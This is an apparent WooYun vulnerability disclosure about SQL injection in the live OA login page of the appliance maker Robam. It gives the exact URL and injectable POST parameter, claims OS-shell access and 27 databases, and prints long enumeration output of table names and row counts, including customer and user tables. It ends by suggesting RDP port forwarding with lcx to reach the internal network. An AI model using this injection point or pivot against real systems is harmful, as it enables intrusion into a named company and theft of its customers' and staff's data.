乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-25: 厂商已经主动忽略漏洞,细节向公众公开
专业厨房电器
老板电器OA系统:http://oa.robam.com/oa/login.asp注入点:(POST)button1=%b5%c7%c2%bc&pwd=1&uid=F uid参数未做过滤
27个库:
可os-shell:
大量企业内部数据:Database: robam
+---------------------------------------------+---------+| Table | Entries |+---------------------------------------------+---------+| dbo.EB_RECALL_RESULT | 20641984 || dbo.WF_ACTIVE_HISTORY | 15304619 || dbo.EB_REPAIR_PROCESS | 10388513 || dbo.EB_REPAIR_PROCESS_BK | 6507983 || dbo.ST_STOCK_DETAIL_CENTER_PRODUCT | 6141723 || dbo.EB_CUSTOMER_PRODUCT | 5447744 || dbo.EB_GOODSBILL_DETAIL_HISTORY | 4263896 || dbo.EB_SELLBILL_DETAIL_HISTORY | 4262997 || dbo.ST_STOCK_BILL_CENTER_PRODUCT | 4159260 || dbo.ST_STOCK_DETAIL_CENTER_PRODUCT_BF | 4073056 || dbo.ST_APPLY_BILL_DETAIL_HISTORY | 3116113 || dbo.EB_GOODSBILL_DETAIL_HISTORY_BK | 2764312 || dbo.EB_REPAIR_HISTORY | 2671226 || dbo.ST_STOCK_BILL_CENTER_PRODUCT_BF | 2656724 || dbo.WF_STATE_HISTORY | 2460002 || dbo.EB_CUSTOMER | 2171553 || dbo.SYS_LOGIN_USERS | 2133212 || dbo.ST_DAILY_STOCK_CENTER_PRODUCT | 1971417 || dbo.EB_BALANCE_DETAIL | 1922419 || dbo.EB_GOODS_BILL_HISTORY | 1688643 || dbo.EB_REPAIR_HISTORY_BK | 1628772 || dbo.EB_SELL_BILL_HISTORY | 1572831 || dbo.ST_STOCK_DETAIL_CENTER_FITTINGS_NEW | 1550110 || dbo.EB_REPAIR_FAULTCODE | 1397925 || dbo.ST_STOCK_DETAIL_OTHER_PRODUCT | 1295683 || dbo.EB_BALANCE_DETAIL_BK | 1105139 || dbo.EB_GOODS_BILL_HISTORY_BK | 1086769 || dbo.EB_RECALL_HISTORY | 894542 || dbo.ST_STOCK_BILL_OTHER_PRODUCT | 865518 || dbo.ST_STOCK_DETAIL_WORKER_FITTINGS_NEW | 857202 || dbo.ST_DAILY_STOCK_OTHER_PRODUCT | 853046 || dbo.ST_DAILY_STOCK_CENTER_FITTINGS_NEW | 807257 || dbo.EB_REPAIR_FITTINGS | 784124 || dbo.ST_STOCK_BILL_CENTER_FITTINGS_NEW | 741384 || dbo.ST_APPLY_BILL_HISTORY | 691997 || dbo.ST_STOCK_DETAIL_SHOP_PRODUCT | 590716 || dbo.ST_STOCK_DETAIL_CENTER_FITTINGS_OLD | 511680 || dbo.EB_REPAIR_FITTINGS_TEMP | 469633 || dbo.ST_STOCK_DETAIL_WORKER_FITTINGS_OLD | 459449 || dbo.ST_STOCK_DETAIL_SHOP_PRODUCT_BF | 447865 || dbo.ST_STOCK_BILL_WORKER_FITTINGS_NEW | 447853 || dbo.ST_STOCK_BILL_WORKER_FITTINGS_OLD | 439128 || dbo.ST_STOCK_BILL_CENTER_FITTINGS_OLD | 379192 || dbo.ST_STOCK_DETAIL_CHANNEL_PRODUCT | 365679 || dbo.ST_APPLY_DETAIL_SHOWPIECE_HISTORY | 341018 || dbo.ST_STOCK_BILL_SHOP_PRODUCT | 325635 || dbo.ST_STOCK_DETAIL_HEAD_FITTINGS_NEW | 325029 || dbo.ST_DAILY_STOCK_SHOP_PRODUCT | 297876 || dbo.ST_PACKAGE_DETAIL | 281080 || dbo.WF_ACTIVE | 280034 || dbo.ST_SEND_BILL_DETAIL_HISTORY | 279288 || dbo.ST_DAILY_STOCK_CHANNEL_PRODUCT | 266890 || dbo.ST_RETURN_DETAIL_SHOWPIECE_HISTORY | 262061 || dbo.EB_SERVICE_DETAIL | 260659 || dbo.EB_SELLBILL_DETAIL | 246657 || dbo.WF_ACTIVE_BK | 246640 || dbo.EB_REPAIR_FITTINGS_DETAIL | 239402 || dbo.ST_STOCK_BILL_SHOP_PRODUCT_BF | 231832 || dbo.ST_DAILY_STOCK_HEAD_FITTINGS_NEW | 230008 || dbo.ST_DAILY_STOCK_CENTER_FITTINGS_OLD | 228593 || dbo.EB_CUSTOMER_FITTINGS | 193663 || dbo.ST_MONEY_BILL_WORKER | 168248 || dbo.ST_STOCK_DETAIL_SHOP_FITTINGS_NEW | 157316 || dbo.EB_CUSTOMER_VIP | 139003 || dbo.EB_REPAIR | 112740 || dbo.ST_MONEY_BILL_WORKER_BAK | 111497 || dbo.ST_STOCK_BILL_CHANNEL_PRODUCT | 110340 || dbo.TABLE89 | 106284 || dbo.ST_STOCK_DETAIL_HEAD_FITTINGS_OLD | 102738 || dbo.ST_DAILY_STOCK_SHOP_FITTINGS_NEW | 94899 || dbo.ST_RETURN_BILL_SHOWPIECE_HISTORY | 89161 || dbo.ST_STOCK_BILL_SHOP_FITTINGS_NEW | 83769 || dbo.ST_APPLY_BILL_SHOWPIECE_HISTORY | 83203 || dbo.WF_APPROVE_HISTORY | 77426 || dbo.ST_STOCK_TRACK_CHANNEL_PRODUCT | 77156 || dbo.EB_SELL_BILL | 75864 || dbo.ST_STOCK_TRACK_WORKER_FITTINGS_OLD | 68195 || dbo.EB_REPAIR_FITTINGS_BK | 61940 || dbo.ST_STOCK_DETAIL_SHOP_FITTINGS_OLD | 59814 || dbo.EB_REPAIR_NOCALL | 58181 || dbo.EB_GOODSBILL_DETAIL | 54096 || dbo.ST_STOCK_BILL_SHOP_FITTINGS_OLD | 47382 || dbo.ST_STOCK_TRACK_CENTER_FITTINGS_NEW | 44645 || dbo.ST_STOCK_TRACK_OTHER_PRODUCT | 43526 || dbo.ST_STOCK_BILL_HEAD_FITTINGS_NEW | 34841 || dbo.ST_DAILY_STOCK_SHOP_FITTINGS_OLD | 34703 || dbo.ST_STOCK_TRACK_CENTER_PRODUCT | 32642 || dbo.ST_DAILY_STOCK_HEAD_FITTINGS_OLD | 32359 || dbo.ST_MONEY_BILL | 29214 || dbo.ST_SEND_BILL_HISTORY | 24706 || dbo.WF_STATE | 23913 || dbo.EB_CHANGESTYLE_DETAIL | 23897 || dbo.EB_APPEAL_PROCESS | 23762 || dbo.WF_STATE_BK | 23144 || dbo.ST_PACKAGE | 22869 || dbo.EB_GOODS_BILL | 21874 || dbo.EB_GAS_NEW_DETAIL | 21326 || dbo.EB_GAS_OLD_DETAIL | 21295 || dbo.EB_CHANNEL_SELLBILL_DETAIL | 17701 || dbo.EB_GAS_CHANGE | 17351 || dbo.EB_CHANNEL_SELLBILL_DETAIL_HISTORY | 16737 || dbo.SYS_PART_SUB_FUNC | 13198 || dbo.SYS_ORGANIZATION | 12753 || dbo.UR_USERS_PART | 11185 || dbo.SYS_PART_FUNC | 11073 || dbo.SYS_ORGANIZATION_BK_100613 | 10424 || dbo.EB_CHANNEL_SELL_BILL_HISTORY | 9374 || dbo.SYS_MESSAGE_PERSON | 9215 || dbo.EB_MARKET | 8555 || dbo.EB_CHANGE_STYLE | 8098 || dbo.ST_APPLY_BILL_DETAIL | 7956 || dbo.ST_STOCK_TRACK_WORKER_FITTINGS_NEW | 7589 || dbo.EB_CHANNEL_SELL_BILL | 7218 || dbo.ST_STOCK_TRACK_SHOP_FITTINGS_NEW | 7142 || dbo.SYS_MESSAGE | 6708 || dbo.UR_USERS | 6647 || dbo.ST_APPLY_DISREPAIR_HISTORY | 6505 || dbo.EB_DELRP_LOG | 5831 || dbo.CD_SX_BAK | 5815 || dbo.SYS_FITTINGS | 5569 || dbo.EB_APPEAL | 5540 || dbo.ST_STOCK_TRACK_CENTER_FITTINGS_NEW_0616 | 5463 || dbo.EB_SHOP_HUMAN | 4740 || dbo.ST_STOCK_TRACK_HEAD_FITTINGS_NEW | 4718 || dbo.EB_CONSULTING | 4674 || dbo.EB_RECALL | 4641 || dbo.EB_CHANNEL | 4554 || dbo.CD_SX | 4531 || dbo.ST_STOCK_TRACK_HEAD_FITTINGS_OLD | 4509 || dbo.EB_BROWER | 4314 || dbo.EB_RECALL_CREATE | 3980 || dbo.EB_PRICE_DETAIL | 3974 || dbo.ST_STOCK_TRACK_SHOP_PRODUCT | 3853 || dbo.SYS_SERVICE_LOG | 3632 || dbo.ST_STOCK_TRACK_CENTER_FITTINGS_OLD | 3064 || dbo.ST_STOCK_BILL_HEAD_FITTINGS_OLD | 2592 || dbo.ST_MONEY_LIMIT_WORKER | 2085 || dbo.ST_SEND_BILL_DETAIL | 1893 || dbo.EB_OTHERS | 1856 || dbo.ST_MONEY_LIMIT_WORKER_BAK | 1708 || dbo.SYS_ORGANIZATION_BK2 | 1678 || dbo.SYS_ORGANIZATION_BK | 1657 || dbo.SYS_ORGANIZATION_LEON | 1650 || dbo.EB_REPAIR_DISCALL | 1643 || dbo.EB_BALANCE | 1603 || dbo.SYS_BOARD_ORG | 1143 || dbo.ST_APPLY_BILL | 1118 || dbo.UR_USERS_BK_100613 | 1100 || dbo.EB_SHOP | 1089 || dbo.EB_MARKET_BK | 1024 || dbo.SYS_PRODUCT | 900 || dbo.WF_STEP_SETTING | 801 || dbo.SYS_FITTINGS_SAFE_NUM | 730 || dbo.ST_RETURN_DETAIL_SHOWPIECE | 719 || dbo.SYS_SUB_FUNC | 699 || dbo.EB_REPAIR_NONUM | 602 || dbo.ST_APPLY_DETAIL_SHOWPIECE | 585 || dbo.EB_GOODS_CHANGE | 545 || dbo.RTS_REPORT_DETAIL_CONDITION | 510 || dbo.SMS_MESSAGE_LOG | 479 || dbo.ST_STOCK_TRACK_SHOP_FITTINGS_OLD | 474 || dbo.RTS_REPORT_DETAIL_PART | 462 || dbo.SYS_FAULT_CODE | 443 || dbo.EB_WORKERGROUP | 404 || dbo.EB_CHANNEL_BK | 358 || dbo.CD_TELAREA | 346 || dbo.SYS_FUNCTION | 304 || dbo.UR_PART | 264 || dbo.ST_RETURN_BILL_SHOWPIECE | 223 || dbo.WF_STEP_RELATIONSHIP | 203 || dbo.WF_STEP | 193 || dbo.WF_STEP_GRAPHIC | 193 || dbo.ID_CODEID | 189 || dbo.ST_APPLY_BILL_SHOWPIECE | 182 || dbo.EB_QNAIRE_ITEM | 179 || dbo.ST_SEND_BILL | 174 || dbo.EB_KNOWLEDGE_ARTICLE | 171 || dbo.WF_FUNCTION_SETTING | 136 || dbo.SYS_MESSAGE_GROUP | 104 || dbo.ST_MONEY_LIMIT | 92 || dbo.ST_TEMP_TRACK_CENTER_FITTINGS_NEW | 81 || dbo.ORG_ID_FLOWID | 78 || dbo.EB_QNAIRE_QUESTION | 75 || dbo.RTS_REPORT_SETTING | 75 || dbo.SYS_ORG_GROUP_DETAIL | 75 || dbo.RTS_REPORT_CONDITION | 74 || dbo.CD_BILL_TYPE | 68 || dbo.SMS_MESSAGE_SEND | 64 || dbo.CD_SX_TO | 60 || dbo.SYS_USER_GROUP_MEMBER | 46 || dbo.SMS_SendMessage | 36 || dbo.SYS_CATEGORY | 32 || dbo.EB_QUESTION_TYPE | 31 || dbo.WF_WORKFLOW_MODEL | 28 || dbo.EB_BALANCE_DETAIL_OTHER | 27 || dbo.EB_FEE_POLICY_DETAIL | 27 || dbo.WF_OPERATION_FUNCTION | 27 || dbo.CD_YEAR | 26 || dbo.EB_KNOWLEDGE_CATEGORY | 26 || dbo.CD_SEND_TYPE | 23 || dbo.CD_MESSAGESEND_STATUS | 22 || dbo.ID_FLOWID | 21 || dbo.SMS_MESSAGE_CONDITION | 21 || dbo.CD_APPEAL_TYPE | 18 || dbo.SYS_BOARD | 18 || dbo.CD_OUT_SUBJECT_CENTER_PRODUCT | 17 || dbo.SMS_MESSAGE_EMPLOYEEADD | 17 || dbo.SMS_MESSAGE_TASK | 17 || dbo.SYS_BOARD_GROUP | 17 || dbo.CD_OUT_SUBJECT_OTHER_PRODUCT | 16 || dbo.CD_OUT_SUBJECT_SHOP_PRODUCT | 16 || dbo.CD_REPAIR_METHOD | 16 || dbo.CD_OUT_SUBJECT_CENTER_FITTINGS_NEW | 15 || dbo.CD_IN_SUBJECT_CENTER_PRODUCT | 14 || dbo.EB_QNAIRE_TEMPLATE | 14 || dbo.SMS_MESSAGE_TEMPLATE | 14 || dbo.SMS_ReceiveMessage | 14 || dbo.ST_STOCK_TABLE_NAME | 14 || dbo.EB_SELLBILL_DETAIL_SELLER | 13 || dbo.CD_IN_SUBJECT_OTHER_PRODUCT | 12 || dbo.CD_IN_SUBJECT_SHOP_PRODUCT | 12 || dbo.CD_MONTH | 12 || dbo.SMS_MESSAGE_EMPLOYEEADD_GROUP_DETAIL | 12 || dbo.CD_EDUCATION | 11 || dbo.CD_OUT_SUBJECT_HEAD_FITTINGS_NEW | 11 || dbo.CD_PRODUCT_CUSTOMER | 11 || dbo.WF_CD_ACTIVE_STATUS | 11 || dbo.ZQ_CUSTOMER | 11 || dbo.CD_ORG_PRICE | 10 || dbo.CD_IN_SUBJECT_CENTER_FITTINGS_NEW | 9 || dbo.CD_IN_SUBJECT_HEAD_FITTINGS_NEW | 9 || dbo.CD_REPAIR_STATUS | 9 || dbo.RTS_CD_REPORT_GROUP | 9 || dbo.CD_OUT_SUBJECT_SHOP_FITTINGS_NEW | 8 || dbo.EB_SALES_INFO | 8 || dbo.EB_SELLER | 8 || dbo.SMS_ISR | 8 || dbo.ST_APPLY_DISREPAIR | 8 || dbo.CD_APPLY_BILL_STATUS | 7 || dbo.CD_IN_SUBJECT_HEAD_FITTINGS_OLD | 7 || dbo.CD_OUT_SUBJECT_PRODUCT | 7 || dbo.SMS_MESSAGE_USERHIDE | 7 || dbo.CD_CONSULT_TYPE | 6 || dbo.CD_IN_SUBJECT_CENTER_FITTINGS_OLD | 6 || dbo.CD_ORG_LEVEL | 6 || dbo.CD_ORG_PRODUCT_PRICE | 6 || dbo.CD_REPAIR_TYPE | 6 || dbo.CD_WF_CHANGE | 6 || dbo.CD_YYMM | 6 || dbo.CODE_TABLE_LIST | 6 || dbo.EB_PRODUCT_USER_DETAIL | 6 || dbo.CD_BUY_REASON | 5 || dbo.CD_COLORS | 5 || dbo.CD_CUSTOMER_FEEL | 5 || dbo.CD_IN_SUBJECT_PRODUCT | 5 || dbo.CD_IN_SUBJECT_SHOP_FITTINGS_NEW | 5 || dbo.CD_IN_SUBJECT_SHOP_FITTINGS_OLD | 5 || dbo.CD_OUT_SUBJECT_CENTER_FITTINGS_OLD | 5 || dbo.CD_OUT_SUBJECT_HEAD_FITTINGS_OLD | 5 || dbo.CD_QUESTION_TYPE | 5 || dbo.CD_RECALL_TYPE | 5 || dbo.CD_REPAIR_FEE_TYPE | 5 || dbo.EB_CUSTOMER_FEEL | 5 || dbo.RTS_CD_FIELD_EDIT_TYPE | 5 || dbo.WF_CD_WORKFLOW_STATUS | 5 || dbo.CD_ADVERSARY | 4 || dbo.CD_APPEAL_LEVEL | 4 || dbo.CD_APPEAL_SOURCE | 4 || dbo.CD_APPEAL_STATUS | 4 || dbo.CD_BALANCE_STATUS | 4 || dbo.CD_BOOK_TIME | 4 || dbo.CD_CUS_JOB | 4 || dbo.CD_INVOICE_LEVEL | 4 || dbo.CD_MEMBER_TYPE | 4 || dbo.CD_OTHERS_TYPE | 4 || dbo.CD_PRODUCT_TYPE | 4 || dbo.CD_PROMOTION | 4 || dbo.CD_RECALL_FACT | 4 || dbo.CD_SELLPRO_STATUS | 4 || dbo.CD_SEND_INFO | 4 || dbo.CD_STOCK_PRODUCT_ATTRIBUTE | 4 || dbo.SYS_RECALL_SETUP | 4 || dbo.WF_CD_ORG_LEVEL | 4 || dbo.CD_ADV_TYPE | 3 || dbo.CD_COUNT_UNIT | 3 || dbo.CD_CUS_REGION | 3 || dbo.CD_CUS_SATIS | 3 || dbo.CD_CUSPROD_REPAIR | 3 || dbo.CD_FAULT_GRADE | 3 || dbo.CD_INSTALL_SITE | 3 || dbo.CD_INVOICE_TYPE | 3 || dbo.CD_ISLSF | 3 || dbo.CD_OUT_SUBJECT_CHANNEL_PRODUCT | 3 || dbo.CD_PACKAGE_STATUS | 3 || dbo.CD_POLICY | 3 || dbo.CD_PRESENT_DEPTH | 3 || dbo.CD_PRODUCT_LEVEL | 3 || dbo.CD_RECALL_STATE | 3 || dbo.CD_RECALL_STATUS | 3 || dbo.CD_REPAIR_MODE | 3 || dbo.CD_REPAIR_PRI | 3 || dbo.CD_REPAIR_URGENT | 3 || dbo.CD_SELLBILL_STATUS | 3 || dbo.CD_SERVER_MODE | 3 || dbo.EB_FEE_POLICY | 3 || dbo.SYS_FITTINGS_PLACE | 3 || dbo.SYS_USER_GROUP | 3 || dbo.temp | 3 || dbo.WF_CD_FUNCTION_TYPE | 3 || dbo.WF_CD_STEP_TYPE | 3 || dbo.WF_USER_DELEGATE | 3 || dbo.CD_APPROVE | 2 || dbo.CD_CONSULT_STATUS | 2 || dbo.CD_CUS_TYPE | 2 || dbo.CD_FAULT_TYPE | 2 || dbo.CD_FEP_PAY_TYPE | 2 || dbo.CD_FEP_PAY_WAY | 2 || dbo.CD_FITTINGS_TYPE | 2 || dbo.CD_GOODS_WAY | 2 || dbo.CD_IN_SUBJECT_CHANNEL_PRODUCT | 2 || dbo.CD_MONEY_CHANGE_TYPE | 2 || dbo.CD_OUT_SUBJECT_SHOP_FITTINGS_OLD | 2 || dbo.CD_PART_TYPE | 2 || dbo.CD_PAY_STATUS | 2 || dbo.CD_PREMONEY_PLACE | 2 || dbo.CD_PRINT_STATE | 2 || dbo.CD_PROD_TYPE | 2 || dbo.CD_PRODUCE_TYPE | 2 || dbo.CD_PRODUCT_STATUS | 2 || dbo.CD_RECALL_MOD | 2 || dbo.CD_REPAIR_LEVEL | 2 || dbo.CD_REPAIR_SORT | 2 || dbo.CD_RPT_INOUT | 2 || dbo.CD_RPT_NEWOLD | 2 || dbo.CD_RPT_SUBJECT | 2 || dbo.CD_SELLPRODUCT_TYPE | 2 || dbo.CD_SEX | 2 || dbo.CD_USE_STATUS | 2 || dbo.CD_YESNO | 2 || dbo.EB_SELL_BILL_SELLER | 2 || dbo.ST_MONEY_BILL_PRODUCT | 2 || dbo.ST_MONEY_LIMIT_PRODUCT | 2 || dbo.WF_CD_OCCUPY_TYPE | 2 || dbo.WF_CD_USER_DELEGATE_STATUS | 2 || dbo.ZQ_CUSTOMER_PRODUCT | 2 || dbo.CD_IN_SUBJECT_WORKER_FITTINGS_NEW | 1 || dbo.CD_IN_SUBJECT_WORKER_FITTINGS_OLD | 1 || dbo.CD_OUT_SUBJECT_WORKER_FITTINGS_NEW | 1 || dbo.CD_OUT_SUBJECT_WORKER_FITTINGS_OLD | 1 || dbo.CD_RPTOTAL_CUS | 1 || dbo.CD_SERVICE_CONDITON | 1 || dbo.EB_FEE_TRANS | 1 || dbo.EB_GZ | 1 || dbo.EB_KNOWLEDGE_SEARCH | 1 || dbo.EB_MINPRICE_PRODUCT | 1 || dbo.EB_PBFEE_DETAIL | 1 || dbo.EB_PRODUCT_USER | 1 || dbo.SMS_MESSAGE_DISPATCH | 1 || dbo.SMS_Register | 1 || dbo.ST_STOCK_SETTING | 1 || dbo.SYS_ORG_GROUP | 1 |+---------------------------------------------+---------+
Database: portal
+----------------------------+---------+| Table | Entries |+----------------------------+---------+| dbo.UserTrackerPath | 8560269 || dbo.UserTracker | 889885 || dbo.AnnouncementsView | 207526 || dbo.Permission_ | 60027 || dbo.Users_Permissions | 56106 || dbo.userdata2 | 29558 || dbo.UserData | 29307 || dbo.LayoutSet | 19617 || dbo.QuestionnaireAnswer | 17989 || dbo.Resource_ | 12333 || dbo.UserGroupRole | 10464 || dbo.Group_ | 9812 || dbo.Users_Roles | 9484 || dbo.Users_Groups | 9480 || dbo.Users_UserGroups | 4481 || dbo.AnnouncementsDelivery | 3543 || dbo.Contact_ | 2770 || dbo.User_ | 2769 || dbo.PortletPreferences | 2706 || dbo.temp_users | 2265 || dbo.TagsAsset | 2208 || dbo.User_bak | 2010 || dbo.user38 | 1851 || dbo.MyMenu | 1736 || dbo.Chat_Status | 1729 || dbo.BrowserTracker | 1722 || dbo.UNUser | 1665 || dbo.Groups_Permissions | 1547 || dbo.CalMapping | 1530 || dbo.MyProperties | 1468 || dbo.Image | 1426 || dbo.tmpuserid | 1228 || dbo.ResourceCode | 1183 || dbo.User__bak | 1183 || dbo.Phone | 826 || dbo.IGImage | 702 || dbo.Users_Orgs_bak | 695 || dbo.tmp_phone | 654 || dbo.Phone3 | 646 || dbo.Chat_Entry | 633 || dbo.CalEvent | 573 || dbo.Announcements | 540 || dbo.UserMenu | 533 || dbo.CalEvent_bak | 502 || dbo.DLFileRank | 419 || dbo.AnnouncementFile | 403 || dbo.Organization_ | 322 || dbo.Users_Orgs | 300 || dbo._sessioninfo | 282 || dbo.QuestionnaireReply | 279 || dbo.QuestionnaireChoice | 240 || dbo.QuestionnaireStat | 240 || dbo.Region | 236 || dbo.EventHistory | 231 || dbo.Country | 227 || dbo.Users_Orgs_0306 | 194 || dbo.ClassName_ | 174 || dbo.Phone2 | 173 || dbo.SocialActivity | 165 || dbo.tmporg | 142 || dbo.tmporg2 | 141 || dbo.Roles_Permissions | 115 || dbo.UserMap | 72 || dbo.UserMapPicture | 72 || dbo.ListType | 63 || dbo.QuestionnaireQuestion | 60 || dbo.EventHistoryView | 54 || dbo.Sidmapping | 27 || dbo.IGFolder | 23 || dbo.ForeignCompany | 20 || dbo.ForeignCompanyUser | 18 || dbo.DataMaskRule | 16 || dbo.EmailAddress | 16 || dbo.PersonalInfoCol | 16 || dbo.czguser | 15 || dbo.Layout | 13 || dbo.Counter | 12 || dbo.Role_ | 11 || dbo.OrgLabor | 10 || dbo.SysProperties | 9 || dbo.Label | 7 || dbo.Marquee | 7 || dbo.BookingSessionDevice | 6 || dbo.BookingSessionRoom | 6 || dbo.Message | 6 || dbo.CalEventFile | 5 || dbo.MsgEventFile | 5 || dbo.QUARTZ_LOCKS | 5 || dbo.UserGroup | 5 || dbo.MBDiscussion | 4 || dbo.MBMessage | 4 || dbo.MBThread | 4 || dbo.Address | 3 || dbo.AnnouncementType | 3 || dbo.DLFileEntry | 3 || dbo.ForeignCompanyMapping | 3 || dbo.PollsChoice | 3 || dbo.AnnouncementFileTemp | 2 || dbo.DLFolder | 2 || dbo.MBCategory | 2 || dbo.RatingsEntry | 2 || dbo.RatingsStats | 2 || dbo.UserMenuIcon | 2 || dbo.Account_ | 1 || dbo.BookingSessionRoomFile | 1 || dbo.Company | 1 || dbo.DscGroupCal | 1 || dbo.Label_Portlet | 1 || dbo.MBMailingList | 1 || dbo.PasswordPolicy | 1 || dbo.PollsQuestion | 1 || dbo.Questionnaire | 1 || dbo.QuestionnaireType | 1 || dbo.Release_ | 1 || dbo.ServiceComponent | 1 || dbo.SessionRoom | 1 |+----------------------------+---------+
用lcx之类将3389做端口转发,可内网
检查
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)